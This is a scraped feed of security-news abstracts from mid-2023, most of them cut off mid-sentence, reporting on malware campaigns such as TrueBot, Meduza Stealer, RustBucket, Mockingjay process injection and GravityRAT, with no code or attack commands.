Cybersecurity agencies have warned about the emergence of new variants of the TrueBot malware. This enhanced threat is now targeting companies in the U.S. and Canada with the intention of extracting confidential data from infiltrated systems. These sophisticated attacks exploit a critical vulnerability ( CVE-2022-31199 ) in the widely used Netwrix Auditor server and its associated agents. This vulnerability enables unauthorized attackers to execute malicious code with the SYSTEM user's privileges, granting them unrestricted access to compromised systems. The TrueBot malware , linked with cybercriminal collectives Silence and FIN11, is deployed to siphon off data and disseminate ransomware, jeopardising the safety of numerous infiltrated networks. The cybercriminals gain their initial foothold by exploiting the cited vulnerability, then proceed to install TrueBot. Once they have breached the networks, they install the FlawedGrace Remote Access Trojan (RAT) to escalate their pThe Hacker News
July 6, 2023
TeamsPhisher Tool Exploits Microsoft Teams to Deploy Malware Full Text
Abstract
A new tool available on GitHub can enable attackers to misuse a recently disclosed vulnerability in Microsoft Teams and automatically deliver malicious files to users' systems.Cyware
July 06, 2023
Iranian Hackers’ Sophisticated Malware Targets Windows and macOS Users Full Text
Abstract
The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware. "TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report. "When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest." TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR). In the attack sequence discoveThe Hacker News
July 5, 2023
RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild Full Text
Abstract
RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks...Security Affairs
July 05, 2023
Node.js Users Beware: Manifest Confusion Attack Opens Door to Malware Full Text
Abstract
The npm registry for the Node.js JavaScript runtime environment is susceptible to what's called a manifest confusion attack that could potentially allow threat actors to conceal malware in project dependencies or perform arbitrary script execution during installation. "A npm package's manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week. "Manifests are never fully validated against the tarball's contents." "The ecosystem has broadly assumed the contents of the manifest and tarball are consistent," Clarke added. The problem, at its core, stems from the fact that the manifest and package metadata are decoupled and that they are never cross-referenced against one another, thereby leading to unexpected behavior and misuse when there is a mismatch. As a result, a threat actor could exploit this loophole to publish a module with a maThe Hacker News
July 5, 2023
NoName(057)16’s DDoSia Project’s gets an upgrade Full Text
Abstract
The DDoSia attack tool received an upgrade, it supports a new security mechanism to conceal the list of targets. Researchers at the cybersecurity firm Sekoia analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia...Security Affairs
July 4, 2023
New Malware Alert: EarlyRAT Linked to North Korean Hacking Group Full Text
Abstract
EarlyRAT is a straightforward program that immediately starts gathering system data and sending it via a POST request to the C2 server. The execution of commands on the infected system is EarlyRAT’s second main purpose.Cyware
July 03, 2023
Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets Full Text
Abstract
In yet another sign of a lucrative crimeware-as-a-service ( CaaS ) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions. "The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data." "From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable." Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail. It'sThe Hacker News
July 3, 2023
New Windows Meduza Stealer targets tens of crypto wallets and password managers Full Text
Abstract
Researchers spotted a new Windows information stealer called Meduza Stealer, the authors employ sophisticated marketing strategies to promote it. The Meduza Stealer can steal browsing activities and extract a wide array of browser-related data, including...Security Affairs
July 3, 2023
Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware Full Text
Abstract
Researchers spotted a new version of the RustBucket Apple macOS malware that supports enhanced capabilities. Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm...Security Affairs
July 01, 2023
Beware: New ‘RustBucket’ Malware Variant Targeting macOS Users Full Text
Abstract
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called RustBucket that comes with improved capabilities to establish persistence and avoid detection by security software. "This variant of RustBucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report published this week, adding it's "leveraging a dynamic network infrastructure methodology for command-and-control." RustBucket is the work of a North Korean threat actor known as BlueNoroff, which is part of a larger intrusion set tracked under the name Lazarus Group , an elite hacking unit supervised by the Reconnaissance General Bureau (RGB), the country's primary intelligence agency. The malware came to light in April 2023, when Jamf Threat Labs described it as an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server. ElasThe Hacker News
June 29, 2023
Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text
Abstract
Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse . The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication bThe Hacker News
June 29, 2023
Previously undetected ThirdEye malware appears in the threat landscape Full Text
Abstract
A new Windows information stealer dubbed ThirdEye appeared in the threat landscape, it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...Security Affairs
June 29, 2023
Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text
Abstract
A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery , said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then traThe Hacker News
June 28, 2023
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text
Abstract
Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i ... Read MoreCyware
June 27, 2023
New Mockingjay process injection technique evades EDR detection Full Text
Abstract
A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.BleepingComputer
June 27, 2023
Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text
Abstract
The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users??.”Cyware
June 27, 2023
New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text
Abstract
A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amonThe Hacker News
June 27, 2023
Mockingjay process injection technique allows EDR bypass Full Text
Abstract
Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...Security Affairs
June 27, 2023
Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text
Abstract
A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021 , and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one oThe Hacker News
June 26, 2023
Trojanized Super Mario Bros game spreads malware Full Text
Abstract
Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...Security Affairs
June 23, 2023
Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text
Abstract
A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS , which contains the name in its " User-Agent " string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to solely focus on malware delivery. Bumblebee , notably, is a replacement for another loader called BazarLoader , which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti , Emotet , and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership betweenThe Hacker News
June 22, 2023
Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text
Abstract
The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.Cyware
June 22, 2023
Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text
Abstract
The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability,...Security Affairs
June 22, 2023
Analyzing the TriangleDB implant used in Operation Triangulation Full Text
Abstract
Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...Security Affairs
June 22, 2023
RDStealer Compromises Remote Desktop Drives for Data Theft Full Text
Abstract
Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. Not a coincidence but all the compromised machines were Dell-manufactured devices.Cyware
June 21, 2023
New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text
Abstract
More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB . "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation TriangulationThe Hacker News
June 21, 2023
New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text
Abstract
A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot theThe Hacker News
June 20, 2023
Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text
Abstract
Virustotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).Cyware
June 20, 2023
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text
Abstract
Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team , which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said . DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure toThe Hacker News
June 19, 2023
New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text
Abstract
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 coThe Hacker News
June 19, 2023
Experts found components of a complex toolkit employed in macOS attacks Full Text
Abstract
Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...Security Affairs
June 19, 2023
DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text
Abstract
The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, file stealing, credential theft, and ransomware.Cyware
June 19, 2023
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text
Abstract
Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed JokerSpy . The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for executThe Hacker News
June 16, 2023
ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text
Abstract
The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS ( DoH ) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the backThe Hacker News
June 16, 2023
Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text
Abstract
Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.Cyware
June 16, 2023
Updated Android spyware GravityRAT steals WhatsApp Backups Full Text
Abstract
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files....Security Affairs
June 15, 2023
SeroXen Incorporates Latest BatCloak Engine Iteration Full Text
Abstract
SeroXen malware uses advanced, fully undetectable (FUD) techniques to infect victims with hVNC-capable malware. The malware uses highly obfuscated batch files as the loading mechanism, utilizing the BatCloak obfuscation engine.Cyware
June 15, 2023
Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities Full Text
Abstract
The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called Arkei and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts. Vidar has also been observed to be distributed via rogue Google Ads and a malware loader dubbed Bumblebee. Team Cymru, in a reportThe Hacker News
June 15, 2023
Android Spyware GravityRAT Goes After WhatsApp Backups Full Text
Abstract
The BingeChat campaign is ongoing and the spyware can exfiltrate WhatsApp backups and receive commands to delete files. The actor behind GravityRAT remains unknown, and the group is tracked internally as SpaceCobra.Cyware
June 15, 2023
Warning: GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files Full Text
Abstract
An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. "Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files," ESET researcher Lukáš Štefanko said in a new report published today. "The malicious apps also provide legitimate chat functionality based on the open-source OMEMO Instant Messenger app." GravityRAT is the name given to a cross-platform malware that's capable of targeting Windows, Android, and macOS devices. The Slovak cybersecurity firm is tracking the activity under the name SpaceCobra. The threat actor is suspected to be based in Pakistan, with recent attacks involving GravityRAT targeting military personnel in India and among the Pakistan Air Force by camouflaging it as cloud storage and entertainment apps, as disclosed by MetaThe Hacker News
June 14, 2023
Deep dive into the Pikabot cyber threat Full Text
Abstract
Pikabot operates as a backdoor, enabling remote access to compromised systems, and receives commands from a C2 server. It uses anti-analysis techniques and deploys an injector to run tests before injecting its core module into a specified process.Cyware
June 14, 2023
New PikaBot Trojan Executes Diverse Range of Commands Full Text
Abstract
Researchers have dissected a new modular malware trojan, dubbed Pikabot, that can execute a diverse range of malicious commands. The trojan self-terminates if the system’s language is Georgian, Kazakh, Uzbek, or Tajik. To stay safe, organizations must deploy the necessary detection tools to root o ... Read MoreCyware
June 14, 2023
New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs Full Text
Abstract
A new Golang-based information stealer called Skuld has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto Fernández Provecho said in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information from the system and files stored in the victim's folders." Skuld, which shares overlaps with publicly available stealers like Creal Stealer , Luna Grabber , and BlackCap Grabber , is the handiwork of a developer who goes by the online alias Deathined on various social media platforms like GitHub, Twitter, Reddit, and Tumblr. Also spotted by Trellix is a Telegram group named deathinews, indicating that these online avenues could be used to promote the offering in the future as a service for other threat actors. The malware, upon execution, checks if it'sThe Hacker News
June 14, 2023
Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits Full Text
Abstract
At least half of dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service. All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, which discovered the activity, said , "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security." The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down. Besides sharing some of the purported findings on Twitter in an attemThe Hacker News
June 14, 2023
LLM meets Malware: Starting the Era of Autonomous Threat Full Text
Abstract
Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats. Executive Summary In this report we shared some insight that emerged during our exploratory research,...Security Affairs
June 14, 2023
BatCloak: Obfuscation Solution Outwitting 80% of AV Engines Full Text
Abstract
Trend Micro cautioned about the utilization of BatCloak, a tool designed to obfuscate batch files and evade antivirus detection engines with an 80% success rate. This ongoing research showcases the continuous evolution of the BatCloak engine, aiming to achieve compatibility with a wide range of mal ... Read MoreCyware
June 13, 2023
Beware: New DoubleFinger Loader Targets Cryptocurrency Wallets with Stealer Full Text
Abstract
A novel multi-stage loader called DoubleFinger has been observed delivering a cryptocurrency stealer dubbed GreetingGhoul in what's an advanced attack targeting users in Europe, the U.S., and Latin America. "DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger's loader stages," Kaspersky researcher Sergey Lozhkin said in a Monday report. The starting point of the attacks is a modified version of espexe.exe – which refers to Microsoft Windows Economical Service Provider application – that's engineered to execute shellcode responsible for retrieving a PNG image file from the image hosting service Imgur. The image employs steganographic trickery to conceal an encrypted payload that triggers a four-stage compromise chain which eventually culminates in the execution of the GreetingGhoul stealer on the infected host. A notable aspect of GreetingGhoThe Hacker News
June 13, 2023
SPECTRALVIPER Backdoor Focuses on Vietnamese Public Companies Full Text
Abstract
Vietnamese public companies have been targeted by the SPECTRALVIPER backdoor in an ongoing campaign. The backdoor, a previously undisclosed x64 variant, offers various capabilities including file manipulation, token impersonation, and PE loading. SPECTRALVIPER can be compiled as an executable o ... Read MoreCyware
June 12, 2023
FUD Malware obfuscation engine BatCloak continues to evolve Full Text
Abstract
Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed the BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat...Security Affairs
June 10, 2023
New SPECTRALVIPER Backdoor Targeting Vietnamese Public Companies Full Text
Abstract
Vietnamese public companies have been targeted as part of an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER . "SPECTRALVIPER is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities," Elastic Security Labs said in a Friday report. The attacks have been attributed to an actor it tracks as REF2754, which overlaps with a Vietnamese threat group known as APT32, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. Meta, in December 2020, linked the activities of the hacking crew to a cybersecurity company named CyberOne Group. In the latest infection flow unearthed by Elastic, the SysInternals ProcDump utility is leveraged to load an unsigned DLL file that contains DONUTLOADER, which, in turn, is configured to load SPECTRALVIPER and other malware such as P8LOADER or POWERSEAL. SPECTRALVIPER is desiThe Hacker News
June 9, 2023
Stealth Soldier backdoor used is targeted espionage attacks in Libya Full Text
Abstract
Researchers detected a cyberespionage campaign in Libya that employs a new custom, modular backdoor dubbed Stealth Soldier. Experts at the Check Point Research team uncovered a series of highly-targeted espionage attacks in Libya that employ a new custom...Security Affairs
June 09, 2023
Stealth Soldier: A New Custom Backdoor Targets North Africa with Espionage Attacks Full Text
Abstract
A new custom backdoor dubbed Stealth Soldier has been deployed as part of a set of highly-targeted espionage attacks in North Africa. "Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information," cybersecurity company Check Point said in a technical report. The ongoing operation is characterized by the use of command-and-control (C&C) servers that mimic sites belonging to the Libyan Ministry of Foreign Affairs. The earliest artifacts associated with the campaign date back to October 2022. The attacks commence with potential targets downloading bogus downloader binaries that are delivered via social engineering attacks and act as a conduit for retrieving Stealth Soldier, while simultaneously displaying a decoy empty PDF file. The custom modular implant, which is believed to be used sparingly, enables surveillance cThe Hacker News
June 07, 2023
New PowerDrop Malware Targeting U.S. Aerospace Industry Full Text
Abstract
An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop . "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, Windows PowerShell, used to concoct the script, and 'Drop' from the DROP (DRP) string used in the code for padding." PowerDrop is also a post-exploitation tool, meaning it's designed to gather information from victim networks after obtaining initial access through other means. The malware employs Internet Control Message Protocol (ICMP) echo request messages as beacons to initiate communications with a command-and-control (C2) server. The server, for its part, responds back with an encrypted command that's decoded and run on the compromised host. A similarThe Hacker News
June 7, 2023
New PowerDrop malware targets U.S. aerospace defense industry Full Text
Abstract
A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop,...Security Affairs
June 06, 2023
New Malware Campaign Leveraging Satacom Downloader to Steal Cryptocurrency Full Text
Abstract
A recent malware campaign has been found to leverage Satacom downloader as a conduit to deploy stealthy malware capable of siphoning cryptocurrency using a rogue extension for Chromium-based browsers. "The main purpose of the malware that is dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites," Kaspersky researchers Haim Zigel and Oleg Kupreev said . Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. Satacom downloader, also called Legion Loader , first emerged in 2019 as a dropper for next-stage payloads, including information stealers and cryptocurrency miners. Infection chains involving the malware begin when users searching for cracked software are redirected to bogus websites that host ZIP archive files containing the malware. "Various typesThe Hacker News
June 3, 2023
DogeRAT Malware Eyes Banking and Entertainment Sectors Full Text
Abstract
A new Android malware threat was discovered targeting users primarily located in India. Named DogeRAT, the malware is distributed through social media and messaging platforms disguised as Opera Mini, OpenAI ChatGPT, and premium versions of Netflix and YouTube. It can gain unauthorized access to a u ... Read MoreCyware
June 01, 2023
Evasive QBot Malware Leverages Short-lived Residential IPs for Dynamic Attacks Full Text
Abstract
An analysis of the "evasive and tenacious" malware known as QBot has revealed that 25% of its command-and-control (C2) servers are merely active for a single day. What's more, 50% of the servers don't remain active for more than a week, indicating the use of an adaptable and dynamic C2 infrastructure , Lumen Black Lotus Labs said in a report shared with The Hacker News. "This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. QBot , also called QakBot and Pinkslipbot, is a persistent and potent threat that started off as a banking trojan before evolving into a downloader for other payloads, including ransomware. Its origins go back as far as 2007. The malware arrives on victims' devices via spear-phishing emails, which either directly incorporate lure files oThe Hacker News
June 01, 2023
New Zero-Click Hack Targets iOS Users with Stealthy Root-Privilege Malware Full Text
Abstract
A previously unknown advanced persistent threat (APT) is targeting iOS devices as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019. "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said . The Russian cybersecurity company said it discovered traces of compromise after creating offline backups of the targeted devices. The attack chain begins with the iOS device receiving a message via iMessage that contains an attachment bearing the exploit. The exploit is said to be zero-click , meaning the receipt of the message triggers the vulnerability without requiring any user interaction in order to achieve code execution. It's also configured to retrieve additional payloads for privilege escalation and drop a final stage malware from a remote server that Kaspersky described asThe Hacker News
June 01, 2023
Malicious PyPI Packages Using Compiled Python Code to Bypass Detection Full Text
Abstract
Researchers have discovered a novel attack on the Python Package Index (PyPI) repository that employs compiled Python code to sidestep detection by application security tools. "It may be the first supply chain attack to take advantage of the fact that Python bytecode (PYC) files can be directly executed," ReversingLabs analyst Karlo Zanki said in a report shared with The Hacker News. The package in question is fshec2 , which was removed from the package registry on April 17, 2023, following responsible disclosure on the same day. PYC files are compiled bytecode files that are generated by the Python interpreter when a Python program is executed. "When a module is imported for the first time (or when the source file has changed since the current compiled file was created) a .pyc file containing the compiled code should be created in a __pycache__ subdirectory of the directory containing the .py file," explains the Python documentation. The package, per thThe Hacker News
May 31, 2023
RomCom RAT Using Deceptive Web of Rogue Software Sites for Covert Attacks Full Text
Abstract
